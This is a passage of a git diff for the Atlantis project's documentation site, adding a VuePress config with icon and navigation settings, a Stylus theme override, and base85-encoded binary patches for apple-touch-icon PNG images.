'apple-touch-icon-57x57.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '114x114', href: 'apple-touch-icon-114x114.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '72x72', href: 'apple-touch-icon-72x72.png' }], + ['link', { rel: 
'apple-touch-icon-precomposed', sizes: '144x144', href: 'apple-touch-icon-144x144.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '60x60', href: 'apple-touch-icon-60x60.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '120x120', href: 'apple-touch-icon-120x120.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '76x76', href: 'apple-touch-icon-76x76.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '152x152', href: 'apple-touch-icon-152x152.png' }], + ['meta', {name: 'msapplication-TileColor', content: '#FFFFFF' }], + ['meta', {name: 'msapplication-TileImage', content: 'mstile-144x144.png' }], + ['meta', {name: 'msapplication-square70x70logo', content: 'mstile-70x70.png' }], + ['meta', {name: 'msapplication-square150x150logo', content: 'mstile-150x150.png' }], + ['meta', {name: 'msapplication-wide310x150logo', content: 'mstile-310x150.png' }], + ['meta', {name: 'msapplication-square310x310logo', content: 'mstile-310x310.png' }], + ['link', { rel: 'stylesheet', sizes: '152x152', href: 'https://fonts.googleapis.com/css?family=Lato:400,900' }] + ], + themeConfig: { + nav: [ + {text: 'Home', link: '/'}, + {text: 'Docs', link: '/docs/'}, + {text: 'Blog', link: 'https://medium.com/runatlantis'} + ], + sidebar: [ + '/docs/', + '/docs/pull-request-commands', + '/docs/deployment', + ], + repo: 'runatlantis/atlantis', + docsDir: 'runatlantis.io', + editLinks: true, + } +} \ No newline at end of file diff --git a/runatlantis.io/.vuepress/override.styl b/runatlantis.io/.vuepress/override.styl new file mode 100644 index 0000000000..deb097c9dc --- /dev/null +++ b/runatlantis.io/.vuepress/override.styl @@ -0,0 +1,40 @@ +$accentColor = #0074db +$textColor = #2c3e50 +$borderColor = #eaecef +$codeBgColor = #282c34 + +.theme-container.home-custom { + .hero { + h1 { + font-size: 64px + font-family: Lato, sans-serif + font-weight: 900 + color: #222 + } + img { + height: 200px + } + } + p.description { + position: relative 
+ } + p.description:before { + position: absolute; + content: ''; + width: 40px; + height: 3px; + top: -19px; + left: 50%; + margin-left: -20px; + background: #ff3366; + } + .feature { + h2 { + color: #222 + } + p { + color: #222 + } + } +} + diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png new file mode 100644 index 0000000000000000000000000000000000000000..e5d8f6877607a1f8b76375d04f96ff47b9ac6f12 GIT binary patch literal 11680 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 
